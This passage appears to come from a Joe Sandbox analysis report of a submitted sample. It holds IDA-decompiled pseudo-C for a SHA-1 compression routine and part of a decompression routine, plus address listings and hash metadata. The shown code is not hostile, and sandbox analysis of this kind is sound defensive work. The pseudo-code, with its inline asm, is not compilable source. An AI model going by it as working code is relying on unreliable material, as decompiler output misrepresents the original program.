					_v28 = _v28 + 0x5a827999 + ((_t853 ^ _t894) & _t596 ^ _t853) + _v24 + _t441;
					_t446 = E00B868E4( *_v32);
					asm("rol edx, 0x5");
					 *_v32 = _t446;
					asm("ror dword [esp+0x2c], 0x2");
					_t853 = _t853 + ((_t596 ^ _t894) & _v24 ^ _t894) + _v28 + 0x5a827999 + _t446;
					_t448 = E00B868E4( *((intOrPtr*)(_v32 + 4)));
					_v32 = _v32 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 + 4)) = _t448;
					_t451 = _v36 + 5;
					asm("ror dword [esp+0x2c], 0x2");
					_v36 = _t451;
					_t894 = _t894 + ((_t596 ^ _v24) & _v28 ^ _t596) + _t853 + _t448 + 0x5a827999;
					_v16 =  &(_t840[_t451]);
					_t453 = E00B868E4(_t840[_t451]);
					_t912 =  &(_t912[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t453;
					_t435 = _v16;
					asm("ror esi, 0x2");
					_t596 = _t596 + 0x5a827999 + ((_v24 ^ _v28) & _t853 ^ _v24) + _t894 + _t453;
				} while (_v36 != 0xf);
				_t774 = _t840[0xe] ^ _t840[9] ^ _t840[1] ^ _t840[3];
				_v32 = _t853;
				_t857 = _t840[0xd] ^ _t840[8] ^  *_t840 ^ _t840[2];
				asm("rol ecx, 0x5");
				asm("rol esi, 1");
				asm("rol edx, 1");
				asm("ror ebp, 0x2");
				_t840[1] = _t774;
				_t459 = ((_v28 ^ _v32) & _t894 ^ _v28) + _t596 + _t857 + _v24 + 0x5a827999;
				 *_t840 = _t857;
				_v40 = _t459;
				asm("rol ecx, 0x5");
				_t778 = _t840[0xf] ^ _t840[0xa] ^ _t840[4] ^ _t840[2];
				_t465 = ((_v32 ^ _t894) & _t596 ^ _v32) + _t459 + _t774 + _v28 + 0x5a827999;
				_v36 = _t465;
				asm("ror ebx, 0x2");
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror dword [esp+0x10], 0x2");
				_t840[2] = _t778;
				_t471 = ((_t596 ^ _t894) & _v40 ^ _t894) + _t465 + _t778 + _v32 + 0x5a827999;
				_v32 = _t471;
				asm("rol ecx, 0x5");
				_t782 = _t840[0xb] ^ _t840[5] ^ _t857 ^ _t840[3];
				_t858 = _v40;
				asm("rol edx, 1");
				_t840[3] = _t782;
				_v24 = _t596;
				asm("ror dword [esp+0x18], 0x2");
				_t783 = 0x11;
				_v28 = ((_t596 ^ _t858) & _v36 ^ _t596) + _t471 + 0x5a827999 + _t782 + _t894;
				_v16 = _t783;
				do {
					_t96 = _t783 + 5; // 0x16
					_t478 = _t96;
					_t97 = _t783 - 5; // 0xc
					_v8 = _t478;
					_t99 = _t783 + 3; // 0x14
					_t896 = _t99 & 0x0000000f;
					_v12 = _t896;
					_t599 = _t478 & 0x0000000f;
					asm("rol ecx, 0x5");
					_t787 = _t840[_t97 & 0x0000000f] ^ _t840[_t783 & 0x0000000f] ^ _t840[_t896] ^ _t840[_t599];
					_t481 = _v16;
					asm("rol edx, 1");
					_t840[_t896] = _t787;
					_t897 = _v32;
					asm("ror ebp, 0x2");
					_v32 = _t897;
					_t862 = _v20;
					_v24 = _v24 + 0x6ed9eba1 + (_t858 ^ _v36 ^ _t897) + _v28 + _t787;
					_t788 = 0xf;
					_t899 = _t481 + 0x00000004 & _t788;
					_t842 = _t481 + 0x00000006 & _t788;
					_t792 =  *(_t862 + (_t481 - 0x00000004 & _t788) * 4) ^  *(_t862 + (_t481 + 0x00000001 & _t788) * 4) ^  *(_t862 + _t899 * 4) ^  *(_t862 + _t842 * 4);
					asm("rol edx, 1");
					 *(_t862 + _t899 * 4) = _t792;
					_t863 = _v28;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_v28 = _t863;
					_t488 = _v16;
					_v40 = _v40 + 0x6ed9eba1 + (_v36 ^ _v32 ^ _t863) + _v24 + _t792;
					_t865 = _t488 + 0x00000007 & 0x0000000f;
					_t675 = _v20;
					_t797 = _v20[_t488 - 0x00000003 & 0x0000000f] ^  *(_t675 + (_t488 + 0x00000002 & 0x0000000f) * 4) ^  *(_t675 + _t865 * 4) ^  *(_t675 + _t599 * 4);
					asm("rol edx, 1");
					 *(_t675 + _t599 * 4) = _t797;
					_t600 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t600;
					_t601 = _v20;
					_v36 = _v36 + 0x6ed9eba1 + (_t600 ^ _v32 ^ _v28) + _v40 + _t797;
					asm("rol ecx, 0x5");
					_t801 =  *(_t601 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t601 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t601 + _t842 * 4) ^  *(_t601 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t601 + _t842 * 4) = _t801;
					_t602 = _v24;
					_t843 = _v40;
					asm("ror edi, 0x2");
					_v40 = _t843;
					_t840 = _v20;
					_v32 = _v32 + 0x6ed9eba1 + (_t602 ^ _t843 ^ _v28) + _v36 + _t801;
					_t805 = _t840[_v16 - 0x00000007 & 0x0000000f] ^ _t840[_v16 - 0x00000001 & 0x0000000f] ^ _t840[_t865] ^ _t840[_t899];
					_t900 = _v36;
					asm("rol edx, 1");
					asm("rol ecx, 0x5");
					_t840[_t865] = _t805;
					_t858 = _v40;
					_t783 = _v8;
					asm("ror ebp, 0x2");
					_v36 = _t900;
					_v16 = _t783;
					_v28 = _v28 + 0x6ed9eba1 + (_t602 ^ _t858 ^ _t900) + _v32 + _t805;
				} while (_t783 + 3 <= 0x23);
				_t866 = 0x25;
				_v16 = _t866;
				while(1) {
					_t205 = _t866 + 5; // 0x2a
					_t511 = _t205;
					_t206 = _t866 - 5; // 0x20
					_v4 = _t511;
					_t208 = _t866 + 3; // 0x28
					_t807 = _t208 & 0x0000000f;
					_v8 = _t807;
					_t902 = _t511 & 0x0000000f;
					_t870 = _t840[_t206 & 0x0000000f] ^ _t840[_t866 & 0x0000000f] ^ _t840[_t902] ^ _t840[_t807];
					asm("rol esi, 1");
					_t840[_t807] = _t870;
					asm("ror dword [esp+0x1c], 0x2");
					asm("rol edx, 0x5");
					_t871 = 0xf;
					_v24 = _v28 - 0x70e44324 + ((_v36 | _v32) & _v40 | _v36 & _v32) + _t870 + _t602;
					_t518 = _v16;
					_t604 = _t518 + 0x00000006 & _t871;
					_t810 = _t518 + 0x00000004 & _t871;
					_v12 = _t810;
					_t875 = _t840[_t518 - 0x00000004 & _t871] ^ _t840[_t518 + 0x00000001 & _t871] ^ _t840[_t810] ^ _t840[_t604];
					asm("rol esi, 1");
					_t840[_t810] = _t875;
					_t844 = _v28;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_v28 = _t844;
					_t812 = _v20;
					_v40 = _v24 - 0x70e44324 + ((_v32 | _t844) & _v36 | _v32 & _t844) + _t875 + _v40;
					_t525 = _v16;
					_t846 = _t525 + 0x00000007 & 0x0000000f;
					_t879 =  *(_t812 + (_t525 - 0x00000003 & 0x0000000f) * 4) ^  *(_t812 + (_t525 + 0x00000002 & 0x0000000f) * 4) ^  *(_t812 + _t846 * 4) ^  *(_t812 + _t902 * 4);
					asm("rol esi, 1");
					 *(_t812 + _t902 * 4) = _t879;
					asm("rol edx, 0x5");
					_t903 = _v24;
					asm("ror ebp, 0x2");
					_t815 = _v40 + 0x8f1bbcdc + ((_t903 | _v28) & _v32 | _t903 & _v28) + _t879 + _v36;
					_v24 = _t903;
					_t904 = _v20;
					_v36 = _t815;
					asm("rol edx, 0x5");
					_t883 =  *(_t904 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t904 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t904 + _v8 * 4) ^  *(_t904 + _t604 * 4);
					asm("rol esi, 1");
					 *(_t904 + _t604 * 4) = _t883;
					_t602 = _v24;
					asm("ror dword [esp+0x10], 0x2");
					_t816 = _t815 + ((_t602 | _v40) & _v28 | _t602 & _v40) + 0x8f1bbcdc + _t883 + _v32;
					_v32 = _t816;
					asm("rol edx, 0x5");
					_t887 =  *(_t904 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t904 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t904 + _v12 * 4) ^  *(_t904 + _t846 * 4);
					asm("rol esi, 1");
					 *(_t904 + _t846 * 4) = _t887;
					_t905 = _v36;
					asm("ror ebp, 0x2");
					_v36 = _t905;
					_t309 = _t816 - 0x70e44324; // -4294967294
					_t866 = _v4;
					_v28 = _t309 + ((_v40 | _t905) & _t602 | _v40 & _t905) + _t887 + _v28;
					_v16 = _t866;
					if(_t866 + 3 > 0x37) {
						break;
					}
					_t840 = _v20;
				}
				_t817 = 0x39;
				_v16 = _t817;
				_t847 = _t602;
				do {
					_t315 = _t817 + 5; // 0x3e
					_t545 = _t315;
					_v8 = _t545;
					_t317 = _t817 + 3; // 0x3c
					_t318 = _t817 - 5; // 0x34
					_t888 = 0xf;
					_t907 = _t317 & _t888;
					_t606 = _t545 & _t888;
					_t889 = _v20;
					_v4 = _t907;
					_t821 =  *(_t889 + (_t318 & _t888) * 4) ^  *(_t889 + (_t817 & _t888) * 4) ^  *(_t889 + _t907 * 4) ^  *(_t889 + _t606 * 4);
					asm("rol edx, 1");
					 *(_t889 + _t907 * 4) = _t821;
					_t908 = _v32;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v32 = _t908;
					_v24 = (_v40 ^ _v36 ^ _t908) + _t821 + _t847 + _v28 + 0xca62c1d6;
					_t554 = _v16;
					_t822 = 0xf;
					_t849 = _t554 + 0x00000006 & _t822;
					_t910 = _t554 + 0x00000004 & _t822;
					_t826 =  *(_t889 + (_t554 - 0x00000004 & _t822) * 4) ^  *(_t889 + (_t554 + 0x00000001 & _t822) * 4) ^  *(_t889 + _t910 * 4) ^  *(_t889 + _t849 * 4);
					asm("rol edx, 1");
					 *(_t889 + _t910 * 4) = _t826;
					_t890 = _v28;
					asm("rol ecx, 0x5");
					_v40 = (_v36 ^ _v32 ^ _t890) + _t826 + _v40 + _v24 + 0xca62c1d6;
					_t563 = _v16;
					asm("ror esi, 0x2");
					_v28 = _t890;
					_t892 = _t563 + 0x00000007 & 0x0000000f;
					_t746 = _v20;
					_t831 = _v20[_t563 - 0x00000003 & 0x0000000f] ^  *(_t746 + (_t563 + 0x00000002 & 0x0000000f) * 4) ^  *(_t746 + _t892 * 4) ^  *(_t746 + _t606 * 4);
					asm("rol edx, 1");
					 *(_t746 + _t606 * 4) = _t831;
					_t607 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t607;
					_t608 = _v20;
					_v36 = (_t607 ^ _v32 ^ _v28) + _t831 + _v36 + _v40 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t835 = _t608[_v16 - 0x00000008 & 0x0000000f] ^ _t608[_v16 + 0xfffffffe & 0x0000000f] ^ _t608[_v4] ^ _t608[_t849];
					asm("rol edx, 1");
					_t608[_t849] = _t835;
					_t847 = _v24;
					asm("ror dword [esp+0x10], 0x2");
					_v32 = (_t847 ^ _v40 ^ _v28) + _t835 + _v32 + _v36 + 0xca62c1d6;
					_t839 = _t608[_v16 - 0x00000007 & 0x0000000f] ^ _t608[_v16 - 0x00000001 & 0x0000000f] ^ _t608[_t892] ^ _t608[_t910];
					_t911 = _v36;
					asm("rol edx, 1");
					_t608[_t892] = _t839;
					_t609 = _v40;
					_t893 = _v32;
					asm("ror ebp, 0x2");
					_t817 = _v8;
					asm("rol ecx, 0x5");
					_v36 = _t911;
					_t757 = _t893 + 0xca62c1d6 + (_t847 ^ _t609 ^ _t911) + _t839 + _v28;
					_v16 = _t817;
					_v28 = _t757;
				} while (_t817 + 3 <= 0x4b);
				_t591 = _a4;
				_t591[1] = _t591[1] + _t893;
				_t591[2] = _t591[2] + _t911;
				_t591[3] = _t591[3] + _t609;
				 *_t591 =  *_t591 + _t757;
				_t591[4] = _t591[4] + _t847;
				return _t591;
			}

0x00b6f461
0x00b6f46d
0x00b6f479
0x00b6f483
0x00b6f488
0x00b6f48d
0x00b6f46f
0x00b6f46f
0x00b6f473
0x00b6f473
0x00b6f490
0x00b6f499
0x00b6f49c
0x00b6f49e
0x00b6f4a8
0x00b6f4ae
0x00b6f4b2
0x00b6f4b6
0x00b6f4ce
0x00b6f4da
0x00b6f4de
0x00b6f4e0
0x00b6f4e2
0x00b6f4e6
0x00b6f4ea
0x00b6f4ed
0x00b6f4f1
0x00b6f4f4
0x00b6f4ff
0x00b6f504
0x00b6f51e
0x00b6f523
0x00b6f52e
0x00b6f53b
0x00b6f540
0x00b6f554
0x00b6f55b
0x00b6f565
0x00b6f572
0x00b6f57b
0x00b6f58b
0x00b6f597
0x00b6f599
0x00b6f5a4
0x00b6f5a9
0x00b6f5ac
0x00b6f5c0
0x00b6f5c7
0x00b6f5ce
0x00b6f5d7
0x00b6f5db
0x00b6f5df
0x00b6f5ea
0x00b6f5ed
0x00b6f5f0
0x00b6f5fc
0x00b6f60e
0x00b6f611
0x00b6f613
0x00b6f62d
0x00b6f630
0x00b6f646
0x00b6f649
0x00b6f64c
0x00b6f650
0x00b6f654
0x00b6f661
0x00b6f664
0x00b6f666
0x00b6f668
0x00b6f674
0x00b6f694
0x00b6f697
0x00b6f699
0x00b6f69f
0x00b6f6a2
0x00b6f6a8
0x00b6f6b1
0x00b6f6ba
0x00b6f6cd
0x00b6f6d1
0x00b6f6d7
0x00b6f6da
0x00b6f6df
0x00b6f6eb
0x00b6f6f5
0x00b6f6fa
0x00b6f702
0x00b6f707
0x00b6f708
0x00b6f70c
0x00b6f710
0x00b6f714
0x00b6f714
0x00b6f717
0x00b6f71a
0x00b6f721
0x00b6f726
0x00b6f72b
0x00b6f732
0x00b6f73c
0x00b6f745
0x00b6f748
0x00b6f74c
0x00b6f750
0x00b6f753
0x00b6f75b
0x00b6f76b
0x00b6f774
0x00b6f778
0x00b6f781
0x00b6f784
0x00b6f786
0x00b6f798
0x00b6f7a3
0x00b6f7a5
0x00b6f7a8
0x00b6f7ae
0x00b6f7b3
0x00b6f7c6
0x00b6f7cc
0x00b6f7d0
0x00b6f7e0
0x00b6f7e9
0x00b6f7f3
0x00b6f7f6
0x00b6f7f8
0x00b6f7ff
0x00b6f805
0x00b6f814
0x00b6f821
0x00b6f827
0x00b6f82f
0x00b6f850
0x00b6f853
0x00b6f856
0x00b6f85a
0x00b6f85d
0x00b6f863
0x00b6f86f
0x00b6f87c
0x00b6f880
0x00b6f88a
0x00b6f8a3
0x00b6f8aa
0x00b6f8ae
0x00b6f8b0
0x00b6f8b3
0x00b6f8b8
0x00b6f8be
0x00b6f8c6
0x00b6f8d3
0x00b6f8d9
0x00b6f8e0
0x00b6f8e4
0x00b6f8ef
0x00b6f8f0
0x00b6f8fa
0x00b6f8fa
0x00b6f8fa
0x00b6f8fd
0x00b6f900
0x00b6f907
0x00b6f90c
0x00b6f911
0x00b6f918
0x00b6f926
0x00b6f93d
0x00b6f93f
0x00b6f94a
0x00b6f94f
0x00b6f952
0x00b6f95b
0x00b6f95f
0x00b6f966
0x00b6f96b
0x00b6f972
0x00b6f982
0x00b6f98b
0x00b6f98d
0x00b6f990
0x00b6f9a4
0x00b6f9ab
0x00b6f9ae
0x00b6f9b8
0x00b6f9be
0x00b6f9c2
0x00b6f9d2
0x00b6f9e1
0x00b6f9e4
0x00b6f9e6
0x00b6f9ed
0x00b6f9f0
0x00b6fa0c
0x00b6fa19
0x00b6fa1b
0x00b6fa1f
0x00b6fa26
0x00b6fa2d
0x00b6fa46
0x00b6fa4a
0x00b6fa4c
0x00b6fa50
0x00b6fa64
0x00b6fa7b
0x00b6fa80
0x00b6fa87
0x00b6fa9e
0x00b6faa8
0x00b6faaa
0x00b6faae
0x00b6faba
0x00b6fabf
0x00b6fac7
0x00b6facd
0x00b6fad3
0x00b6fad7
0x00b6fae1
0x00000000
0x00000000
0x00b6f8f6
0x00b6f8f6
0x00b6fae9
0x00b6faea
0x00b6faee
0x00b6faf0
0x00b6faf0
0x00b6faf0
0x00b6faf5
0x00b6faf9
0x00b6fafe
0x00b6fb03
0x00b6fb08
0x00b6fb0a
0x00b6fb0c
0x00b6fb10
0x00b6fb1f
0x00b6fb2e
0x00b6fb30
0x00b6fb33
0x00b6fb3b
0x00b6fb40
0x00b6fb49
0x00b6fb4f
0x00b6fb53
0x00b6fb57
0x00b6fb5e
0x00b6fb60
0x00b6fb73
0x00b6fb82
0x00b6fb84
0x00b6fb87
0x00b6fb8f
0x00b6fba2
0x00b6fba6
0x00b6fbaa
0x00b6fbad
0x00b6fbbd
0x00b6fbc6
0x00b6fbd0
0x00b6fbd3
0x00b6fbd5
0x00b6fbdc
0x00b6fbe0
0x00b6fbf5
0x00b6fbfe
0x00b6fc02
0x00b6fc06
0x00b6fc28
0x00b6fc34
0x00b6fc37
0x00b6fc39
0x00b6fc3c
0x00b6fc4a
0x00b6fc57
0x00b6fc74
0x00b6fc77
0x00b6fc7b
0x00b6fc7d
0x00b6fc80
0x00b6fc86
0x00b6fc8e
0x00b6fc97
0x00b6fc9b
0x00b6fca4
0x00b6fca8
0x00b6fcaa
0x00b6fcb1
0x00b6fcb5
0x00b6fcbe
0x00b6fcc2
0x00b6fcc5
0x00b6fcc8
0x00b6fccb
0x00b6fccd
0x00b6fcd7

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
Instruction ID: 040fb41103d186978f15364d943d8dafbc26c3c59530e5a97e7d1cb316658b0b
Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
Instruction Fuzzy Hash: FA525972A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00B77153 Relevance: .5, Instructions: 536
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00B77153(signed int __ecx) {
				void* __ebp;
				void* _t220;
				signed int* _t223;
				signed int _t225;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t233;
				signed int _t234;
				signed short _t235;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				unsigned int _t250;
				signed int _t260;
				signed int _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t274;
				signed int _t275;
				signed short _t276;
				signed int _t277;
				signed int _t281;
				signed int _t282;
				unsigned int _t283;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed int _t292;
				signed short _t293;
				unsigned int _t298;
				signed int _t303;
				unsigned int _t305;
				signed int _t310;
				signed short _t311;
				signed int _t316;
				intOrPtr* _t321;
				signed int* _t322;
				unsigned int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t329;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t340;
				signed int _t342;
				intOrPtr _t344;
				signed int _t345;
				signed int _t346;
				signed int _t348;
				void* _t349;
				signed int _t352;
				signed int _t353;
				unsigned int _t356;
				signed int _t357;
				void* _t358;
				signed int _t361;
				signed int _t362;
				void* _t365;
				signed int _t368;
				signed int _t369;
				intOrPtr* _t371;
				void* _t372;
				signed int* _t376;
				signed int _t379;
				unsigned int _t382;
				signed int _t383;
				void* _t384;
				signed int _t387;
				void* _t390;
				unsigned int _t393;
				signed int _t394;
				unsigned int _t397;
				void* _t399;
				signed int _t402;
				intOrPtr* _t404;
				void* _t405;
				signed int _t408;
				void* _t411;
				signed int _t415;
				signed int _t416;
				intOrPtr* _t418;
				void* _t419;
				void* _t422;
				signed int _t425;
				intOrPtr* _t429;
				void* _t430;
				signed int* _t436;
				unsigned int _t438;
				unsigned int _t442;
				signed int _t445;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				unsigned int _t451;
				unsigned int _t455;
				signed int _t458;
				unsigned int _t459;
				signed int _t461;
				signed int _t462;
				void* _t463;
				signed int _t464;
				signed int* _t465;
				signed char _t466;
				signed int* _t468;
				signed int* _t470;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				void* _t479;

				_t466 =  *(_t479 + 0x44);
				 *(_t479 + 0x30) = __ecx;
				_t321 = _t466 + 0x18;
				_t465 = _t466 + 4;
				if( *((char*)(_t466 + 0x2c)) != 0) {
					L2:
					_t344 =  *_t321;
					_t220 =  *((intOrPtr*)(_t466 + 0x24)) + _t344;
					if( *_t465 <= _t220) {
						 *(_t466 + 0x4ad8) =  *(_t466 + 0x4ad8) & 0x00000000;
						_t223 =  *((intOrPtr*)(_t466 + 0x20)) - 1 + _t344;
						_t436 =  *((intOrPtr*)(_t466 + 0x4acc)) - 0x10;
						 *(_t479 + 0x1c) = _t223;
						 *(_t479 + 0x18) = _t436;
						__eflags = _t223 - _t436;
						if(_t223 >= _t436) {
							_t468 = _t436;
							 *(_t479 + 0x14) = _t436;
						} else {
							_t468 = _t223;
							 *(_t479 + 0x14) = _t468;
						}
						_t322 = _t466 + 0x4ad4;
						while(1) {
							_t345 =  *_t465;
							 *(_t479 + 0x10) = _t322;
							__eflags = _t345 - _t468;
							if(_t345 < _t468) {
								goto L15;
							}
							__eflags = _t345 - _t223;
							if(__eflags > 0) {
								L93:
								return _t223;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t345 - _t436;
								if(_t345 < _t436) {
									L14:
									_t223 = _t466 + 0x4ad4;
									_t322 = _t223;
									 *(_t479 + 0x10) = _t223;
									__eflags = _t345 -  *((intOrPtr*)(_t466 + 0x4acc));
									if(_t345 >=  *((intOrPtr*)(_t466 + 0x4acc))) {
										L92:
										 *((char*)(_t466 + 0x4ad3)) = 1;
										goto L93;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t466 + 0x4ad2));
								if( *((char*)(_t466 + 0x4ad2)) == 0) {
									goto L92;
								}
								goto L14;
							}
							_t223 =  *(_t466 + 8);
							__eflags = _t223 -  *((intOrPtr*)(_t466 + 0x1c));
							if(_t223 >=  *((intOrPtr*)(_t466 + 0x1c))) {
								goto L93;
							}
							goto L12;
							L15:
							_t346 =  *(_t466 + 0x4adc);
							__eflags =  *(_t466 + 0x4ad8) - _t346 - 8;
							if( *(_t466 + 0x4ad8) > _t346 - 8) {
								_t316 = _t346 + _t346;
								 *(_t466 + 0x4adc) = _t316;
								_push(_t316 * 0xc);
								_push( *_t322);
								_t477 = E00B83E3E(_t346, _t436);
								__eflags = _t477;
								if(_t477 == 0) {
									E00B66CA7(0xba1098);
								}
								 *_t322 = _t477;
							}
							_t225 =  *(_t466 + 0x4ad8);
							_t470 = _t225 * 0xc +  *_t322;
							 *(_t479 + 0x2c) = _t470;
							 *(_t466 + 0x4ad8) = _t225 + 1;
							_t227 = E00B6A89D(_t465);
							_t228 =  *(_t466 + 0xb4);
							_t438 = _t227 & 0x0000fffe;
							__eflags = _t438 -  *((intOrPtr*)(_t466 + 0x34 + _t228 * 4));
							if(_t438 >=  *((intOrPtr*)(_t466 + 0x34 + _t228 * 4))) {
								_t348 = 0xf;
								_t229 = _t228 + 1;
								 *(_t479 + 0x28) = _t348;
								__eflags = _t229 - _t348;
								if(_t229 >= _t348) {
									L27:
									_t324 = _t465[1] + _t348;
									_t325 = _t324 & 0x00000007;
									 *_t465 =  *_t465 + (_t324 >> 3);
									 *(_t479 + 0x18) =  *_t465;
									_t233 =  *(_t479 + 0x28);
									_t465[1] = _t325;
									_t349 = 0x10;
									_t352 =  *((intOrPtr*)(_t466 + 0x74 + _t233 * 4)) + (_t438 -  *((intOrPtr*)(_t466 + 0x30 + _t233 * 4)) >> _t349 - _t233);
									__eflags = _t352 -  *((intOrPtr*)(_t466 + 0x30));
									asm("sbb eax, eax");
									_t234 = _t233 & _t352;
									__eflags = _t234;
									_t235 =  *(_t466 + 0xcb8 + _t234 * 2) & 0x0000ffff;
									goto L28;
								}
								_t429 = _t466 + 0x34 + _t229 * 4;
								while(1) {
									__eflags = _t438 -  *_t429;
									if(_t438 <  *_t429) {
										break;
									}
									_t229 = _t229 + 1;
									_t429 = _t429 + 4;
									__eflags = _t229 - 0xf;
									if(_t229 < 0xf) {
										continue;
									}
									_t348 =  *(_t479 + 0x28);
									goto L27;
								}
								_t348 = _t229;
								 *(_t479 + 0x28) = _t229;
								goto L27;
							} else {
								_t430 = 0x10;
								_t464 = _t438 >> _t430 - _t228;
								_t342 = ( *(_t464 + _t466 + 0xb8) & 0x000000ff) + _t465[1];
								 *_t465 =  *_t465 + (_t342 >> 3);
								_t325 = _t342 & 0x00000007;
								 *(_t479 + 0x18) =  *_t465;
								_t465[1] = _t325;
								_t235 =  *(_t466 + 0x4b8 + _t464 * 2) & 0x0000ffff;
								L28:
								_t353 = _t235 & 0x0000ffff;
								__eflags = _t353 - 0x100;
								if(_t353 >= 0x100) {
									__eflags = _t353 - 0x106;
									if(_t353 < 0x106) {
										__eflags = _t353 - 0x100;
										if(_t353 != 0x100) {
											__eflags = _t353 - 0x101;
											if(_t353 != 0x101) {
												_t237 = 3;
												 *_t470 = _t237;
												_t470[2] = _t353 - 0x102;
												_t239 = E00B6A89D(_t465);
												_t240 =  *(_t466 + 0x2d78);
												_t442 = _t239 & 0x0000fffe;
												__eflags = _t442 -  *((intOrPtr*)(_t466 + 0x2cf8 + _t240 * 4));
												if(_t442 >=  *((intOrPtr*)(_t466 + 0x2cf8 + _t240 * 4))) {
													_t326 = 0xf;
													_t241 = _t240 + 1;
													__eflags = _t241 - _t326;
													if(_t241 >= _t326) {
														L86:
														_t356 = _t465[1] + _t326;
														_t357 = _t356 & 0x00000007;
														_t465[1] = _t357;
														_t243 = _t356 >> 3;
														 *_t465 =  *_t465 + _t243;
														 *(_t479 + 0x30) = _t357;
														_t358 = 0x10;
														_t361 =  *((intOrPtr*)(_t466 + 0x2d38 + _t326 * 4)) + (_t442 -  *((intOrPtr*)(_t466 + 0x2cf4 + _t326 * 4)) >> _t358 - _t326);
														__eflags = _t361 -  *((intOrPtr*)(_t466 + 0x2cf4));
														asm("sbb eax, eax");
														_t244 = _t243 & _t361;
														__eflags = _t244;
														_t245 =  *(_t466 + 0x397c + _t244 * 2) & 0x0000ffff;
														L87:
														_t246 = _t245 & 0x0000ffff;
														__eflags = _t246 - 8;
														if(_t246 >= 8) {
															_t362 = 3;
															_t329 = (_t246 >> 2) - 1;
															_t445 = ((_t246 & _t362 | 0x00000004) << _t329) + 2;
															 *(_t479 + 0x2c) = _t445;
															__eflags = _t329;
															if(_t329 != 0) {
																_t250 = E00B6A89D(_t465);
																_t365 = 0x10;
																_t445 =  *(_t479 + 0x2c) + (_t250 >> _t365 - _t329);
																_t368 =  *(_t479 + 0x30) + _t329;
																 *_t465 =  *_t465 + (_t368 >> 3);
																_t369 = _t368 & 0x00000007;
																__eflags = _t369;
																_t465[1] = _t369;
															}
														} else {
															_t445 = _t246 + 2;
														}
														_t470[1] = _t445;
														L33:
														_t322 =  *(_t479 + 0x10);
														L34:
														_t436 =  *(_t479 + 0x1c);
														_t223 =  *(_t479 + 0x20);
														_t468 =  *(_t479 + 0x14);
														continue;
													}
													_t371 = _t466 + 0x2cf8 + _t241 * 4;
													while(1) {
														__eflags = _t442 -  *_t371;
														if(_t442 <  *_t371) {
															break;
														}
														_t241 = _t241 + 1;
														_t371 = _t371 + 4;
														__eflags = _t241 - 0xf;
														if(_t241 < 0xf) {
															continue;
														}
														goto L86;
													}
													_t326 = _t241;
													goto L86;
												}
												_t372 = 0x10;
												_t447 = _t442 >> _t372 - _t240;
												_t331 = ( *(_t447 + _t466 + 0x2d7c) & 0x000000ff) + _t465[1];
												 *_t465 =  *_t465 + (_t331 >> 3);
												_t332 = _t331 & 0x00000007;
												_t465[1] = _t332;
												_t245 =  *(_t466 + 0x317c + _t447 * 2) & 0x0000ffff;
												 *(_t479 + 0x30) = _t332;
												goto L87;
											}
											 *_t470 = 2;
											goto L33;
										}
										_push(_t479 + 0x38);
										E00B73F9D( *((intOrPtr*)(_t479 + 0x34)), _t465);
										_t322 =  *(_t479 + 0x10);
										_t470[1] =  *(_t479 + 0x38) & 0x000000ff;
										_t470[2] =  *(_t479 + 0x3c);
										_t448 = 4;
										 *_t470 = _t448;
										_t260 =  *(_t466 + 0x4ad8);
										_t376 = _t260 * 0xc +  *_t322;
										 *(_t466 + 0x4ad8) = _t260 + 1;
										_t376[1] =  *(_t479 + 0x44) & 0x000000ff;
										 *_t376 = _t448;
										_t376[2] =  *(_t479 + 0x40);
										goto L34;
									}
									_t264 = _t353 - 0x106;
									__eflags = _t264 - 8;
									if(_t264 >= 8) {
										_t449 = 3;
										_t379 = (_t264 >> 2) - 1;
										 *(_t479 + 0x30) = _t379;
